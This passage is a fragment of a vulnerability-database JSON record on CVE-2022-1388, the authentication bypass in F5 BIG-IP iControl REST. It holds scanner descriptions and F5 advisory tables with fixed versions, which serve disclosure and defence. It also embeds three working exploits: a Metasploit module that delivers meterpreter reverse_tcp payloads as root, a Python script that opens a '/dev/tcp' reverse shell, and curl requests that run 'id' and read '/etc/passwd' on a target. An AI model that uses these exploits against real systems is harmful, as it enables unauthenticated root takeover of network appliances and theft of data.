"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:15:07", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-22T13:24:19", "id": 
"9267A549-88B1-5288-8C2B-C4BCAD621D57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T16:59:47", "description": "# CVE-2022-1388-POC\nBIG-IP iCONTROL REST API AUTH BYPASS /RCE EX...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-07T01:31:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T20:29:21", "id": "B38FDF75-522A-5254-9A3F-92C0D7B8CC99", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-23T04:17:49", "description": "# F5 CVE-2022-1388 Scanner\n[ \n\n\n### Background\n\nF5 BIG-IP is a suite of network security products. \n\n### Problem\n\nAn authentication bypass vulnerability in the iControl REST service allows remote attackers to execute arbitrary commands. 
\n\n### Resolution\n\nUpgrade to one of the fixed versions referenced in [K23605346](<https://support.f5.com/csp/article/K23605346>). \n\n### References\n\n<https://support.f5.com/csp/article/K23605346> \n<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T00:00:00", "type": "saint", "title": "F5 BIG-IP iControl REST vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-13T00:00:00", "id": "SAINT:1F156F6EAF49E8162691F7AD93A6F23F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/f5_icontrol_rest", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T10:36:36", "description": "Added: 05/13/2022 \nCVE: [CVE-2022-1388](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) \n\n\n### Background\n\nF5 BIG-IP is a suite of network security products. 
\n\n### Problem\n\nAn authentication bypass vulnerability in the iControl REST service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to one of the fixed versions referenced in [K23605346](<https://support.f5.com/csp/article/K23605346>). \n\n### References\n\n<https://support.f5.com/csp/article/K23605346> \n<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T00:00:00", "type": "saint", "title": "F5 BIG-IP iControl REST vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-13T00:00:00", "id": "SAINT:8205BD2F42401C0064F30BBAC68F4F90", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/f5_icontrol_rest", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-12T16:45:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "PACKETSTORM:167150", "href": "https://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability \nin the F5 BIG-IP iControl REST service to gain access to the \nadmin account, which is capable of executing commands \nthrough the /mgmt/tm/util/bash endpoint. \n \nSuccessful exploitation results in remote code execution \nas the root user. 
\n}, \n'Author' => [ \n'Heyder Andrade', # Metasploit module \n'alt3kx <alt3kx[at]protonmail.com>', # PoC \n'James Horseman', # Technical Writeup \n'Ron Bowes' # Documentation of exploitation specifics \n], \n'References' => [ \n['CVE', '2022-1388'], \n['URL', 'https://support.f5.com/csp/article/K23605346'], \n['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup \n['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-05-04', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter. \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts. \n'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts. 
\n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/restjavad.0.log (rotated) \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), \nOptString.new('HttpUsername', [true, 'iControl username', 'admin']), \nOptString.new('HttpPassword', [true, 'iControl password', '']) \n] \n) \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'), \n'method' => 'GET' \n}) \n \nreturn CheckCode::Unknown unless res&.code == 401 \n \nbody = res.get_json_document \n \nreturn CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse' \n \nsignature = Rex::Text.rand_text_alpha(13) \nstub = \"echo #{signature}\" \nres = send_command(stub) \nreturn CheckCode::Safe unless res&.code == 200 \n \nbody = res.get_json_document \n \nreturn CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate' \n \nreturn CheckCode::Vulnerable if body['commandResult'].chomp == signature \n \nCheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_command(cmd) \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \njson = res.get_json_document \n \nunless res.code == 200 && json['kind'] == 'tm:util:bash:runstate' \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n 
\nprint_good('Successfully executed command') \n \nreturn unless (cmd_result = json['commandResult']) \n \nvprint_line(cmd_result) \nend \n \ndef send_command(cmd) \nbash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\" \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'headers' => { \n'Host' => 'localhost', \n'Connection' => 'keep-alive, X-F5-Auth-Token', \n'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6) \n}, \n'data' => { \n'command' => 'run', \n'utilCmdArgs' => \"-c '#{bash_cmd}'\" \n}.to_json \n}, datastore['CmdExecTimeout']) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167150/f5_icontrol_rce.rb.txt"}, {"lastseen": "2022-05-12T16:46:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP 16.0.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "PACKETSTORM:167118", "href": "https://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) \n# Exploit Author: Yesith Alvarez \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x \n# CVE : CVE-2022-1388 \n \nfrom requests import Request, Session \nimport sys \nimport json \n \n \n \ndef title(): \nprint(''' \n \n_______ ________ ___ ___ ___ ___ __ ____ ___ ___ \n/ ____\\ \\ / / ____| |__ \\ / _ \\__ \\|__ \\ /_ |___ \\ / _ \\ / _ \\ \n| | \\ \\ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | \n| | \\ \\/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < \n| |____ \\ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \n\\_____| \\/ |______| |____|\\___/____|____| |_|____/ \\___/ \\___/ \n \n \n \nAuthor: Yesith Alvarez \nGithub: https://github.com/yealvarez \nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ \n''') \n \ndef exploit(url, lhost, lport): \nurl = url + 'mgmt/tm/util/bash' \ndata = { \n\"command\":\"run\", \n\"utilCmdArgs\":\"-c 'bash -i >& /dev/tcp/\"+lhost+\"/\"+lport+\" 0>&1'\" \n \n} \nheaders = { \n'Authorization': 'Basic YWRtaW46', \n'Connection':'keep-alive, X-F5-Auth-Token', \n'X-F5-Auth-Token': '0' \n \n} \ns = Session() \nreq = Request('POST', url, json=data, headers=headers) \nprepped = req.prepare() \ndel prepped.headers['Content-Type'] \nresp = s.send(prepped, \nverify=False, \ntimeout=15 \n) \n#print(prepped.headers) \n#print(url) \n#print(resp.headers) \n#print(resp.json()) \nprint(resp.status_code) \n \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 4): \nprint('[+] USAGE: python3 %s https://<target_url> lhost lport\\n'%(sys.argv[0])) \nprint('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\\n'%(sys.argv[0])) \nprint('[+] Do not 
forget to run the listener: nc -lvp 4444\\n') \nexit(0) \nelse: \nexploit(sys.argv[1],sys.argv[2],sys.argv[3]) \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167118/f5bigip160x-exec.txt"}, {"lastseen": "2022-05-09T16:17:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T00:00:00", "id": "PACKETSTORM:167007", "href": "https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html", "sourceData": "`# F5 BIG-IP RCE exploitation (CVE-2022-1388) \n \nPOST (1): \n \nPOST /mgmt/tm/util/bash HTTP/1.1 \nHost: <redacted>:8443 \nAuthorization: Basic YWRtaW46 \nConnection: keep-alive, X-F5-Auth-Token \nX-F5-Auth-Token: 0 \n \n{\"command\": \"run\" , \"utilCmdArgs\": \" -c 'id' \" } \n \ncurl commandliner: \n \n$ curl -i -s -k -X $'POST' \n-H $'Host: <redacted>:8443' \n-H $'Authorization: Basic YWRtaW46' \n-H 
$'Connection: keep-alive, X-F5-Auth-Token' \n-H $'X-F5-Auth-Token: 0' \n-H $'Content-Length: 52' \n--data-binary $'{\\\"command\\\": \\\"run\\\" , \\\"utilCmdArgs\\\": \\\" -c \\'id\\' \\\" }\\x0d\\x0a' \n$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 \n \n \nPOST (2): \n \nPOST /mgmt/tm/util/bash HTTP/1.1 \nHost: <redacted>:8443 \nAuthorization: Basic YWRtaW46 \nConnection: keep-alive, X-F5-Auth-Token \nX-F5-Auth-Token: 0 \n \n{\"command\": \"run\" , \"utilCmdArgs\": \" -c ' cat /etc/passwd' \" } \n \ncurl commandliner: \n \n$ curl -i -s -k -X $'POST' \n-H $'Host: <redacted>:8443' \n-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \n-H $'X-F5-Auth-Token: 0' \n--data-binary $'{\\\"command\\\": \\\"run\\\" , \\\"utilCmdArgs\\\": \\\" -c \\' cat /etc/passwd\\' \\\" }\\x0d\\x0a\\x0d\\x0a' \n$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080 \n \nNote: \n \nIssue could be related between frontend and backend authentication \"Jetty\" with empty credentials \"admin: <empty>\" \n+ value of headers ,see \"HTTP hop_by_hop request headers\"... \n \nReferences and Fixes : \n* https://support.f5.com/csp/article/K23605346 \n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 \n \nHere the documentation used latest nites: \n* https://clouddocs.f5.com/api/icontrol-rest/ \n \nHTTP hop_by_hop request headers: \n* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open \n \n# Author \nAlex Hernandez aka @_alt3kx_ \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167007/CVE-2022-1388-poc.txt"}], "f5": [{"lastseen": "2022-05-09T19:31:21", "description": "Undisclosed requests may bypass iControl REST authentication. 
([CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>))\n\nImpact\n\nThis vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T12:23:00", "type": "f5", "title": "BIG-IP iControl REST vulnerability CVE-2022-1388", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T18:32:00", "id": "F5:K23605346", "href": "https://support.f5.com/csp/article/K23605346", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-06T23:47:00", "description": "On May 4, 2022, F5 announced the following security issues. This document is intended to serve as an overview of these vulnerabilities and security exposures to help determine the impact to your F5 devices. 
You can find the details of each issue in the associated security advisory.\n\nDistributed Cloud and Managed Services\n\nService | Status \n---|--- \nF5 Distributed Cloud Services | Does not affect or has been resolved \nSilverline | Does not affect or has been resolved \nThreat Stack | Does not affect or has been resolved \n \n * [Critical CVEs](<https://support.f5.com/csp/article/K55879220#critical>)\n * [High CVEs](<https://support.f5.com/csp/article/K55879220#high>)\n * [Medium CVEs](<https://support.f5.com/csp/article/K55879220#medium>)\n * [Low CVEs](<https://support.f5.com/csp/article/K55879220#low>)\n * [Security Exposures](<https://support.f5.com/csp/article/K55879220#exposure>)\n\nCritical CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>) | 9.8 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nHigh CVEs\n\nSecurity Advisory (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K52322100: Authenticated F5 BIG-IP Guided Configuration integrity check in Appliance mode vulnerability CVE-2022-25946](<https://support.f5.com/csp/article/K52322100>) | 8.7 - Appliance mode only | BIG-IP Guided Configuration | 3.0 - 8.0 | 9.0 \nBIG-IP (ASM, Advanced WAF, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K68647001: Authenticated F5 BIG-IP Guided Configuration in Appliance mode vulnerability CVE-2022-27806](<https://support.f5.com/csp/article/K68647001>) | 8.7 - Appliance mode only | BIG-IP Guided Configuration | 3.0 - 8.0 | 
9.0 \nBIG-IP (Advanced WAF, APM, ASM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K70300233: BIG-IP TMUI XSS vulnerability CVE-2022-28707](<https://support.f5.com/csp/article/K70300233>) | 8.0 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n[K33552735: BIG-IP Edge Client for Windows vulnerability CVE-2022-29263](<https://support.f5.com/csp/article/K33552735>) | 7.8 | BIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \nBIG-IP APM Clients | 7.1.8 - 7.2.1 | 7.2.2 \n7.2.1.5 \n[K81952114: Authenticated iControl REST in Appliance mode vulnerability CVE-2022-26415](<https://support.f5.com/csp/article/K81952114>) | 7.7 - Appliance mode only | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K23454411: DNS profile vulnerability CVE-2022-26372](<https://support.f5.com/csp/article/K23454411>) | 7.5 | BIG-IP (all modules) | 15.1.0 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 16.0.0 \n15.1.0.2 \n14.1.4.6 \n13.1.5 \n[K25451853: TMUI XSS vulnerability CVE-2022-28716](<https://support.f5.com/csp/article/K25451853>) | 7.5 | BIG-IP (AFM, CGNAT, PEM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K16187341: BIG-IP ICAP profile vulnerability CVE-2022-27189](<https://support.f5.com/csp/article/K16187341>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K21317311: F5 BIG-IP Guided Configuration XSS vulnerability 
CVE-2022-27230](<https://support.f5.com/csp/article/K21317311>) | 7.5 | BIG-IP Guided Configuration | 3.0 - 8.0 | 9.0 \nBIG-IP (APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0.8 - 13.1.5 | 17.0.0 \n[K37155600: BIG-IP RTSP profile vulnerability CVE-2022-28691](<https://support.f5.com/csp/article/K37155600>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n13.1.5 \n[K14229426: BIG-IP SSL vulnerability CVE-2022-29491](<https://support.f5.com/csp/article/K14229426>) | 7.5 | BIG-IP (LTM, Advanced WAF, ASM, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.5 \n12.1.0 - 12.1.6 \n11.6.1 - 11.6.5 | 17.0.0 \n16.1.2.2 \n15.1.5 \n14.1.4.6 \n[K52340447: F5 ePVA vulnerability CVE-2022-28705](<https://support.f5.com/csp/article/K52340447>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.5 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.2 \n15.1.5.1 \n14.1.4.6 \n13.1.5 \n[K03442392: BIG-IP ASM and F5 Advanced WAF vulnerability CVE-2022-26890](<https://support.f5.com/csp/article/K03442392>) | 7.5 | BIG-IP (ASM, Advanced WAF, APM) | 16.1.0 - 16.1.2 \n15.1.0 - 15.1.4 \n14.1.0 - 14.1.4 \n13.1.0 - 13.1.4 | 17.0.0 \n16.1.2.1 \n15.1.5 \n14.1.4.6 \n13.1.5 \n[K99123750: BIG-IP Stream profile vulnerability CVE-2022-28701](<https://support.f5.com/csp/article/K99123750>) | 7.5 | BIG-IP (all modules) | 16.1.0 - 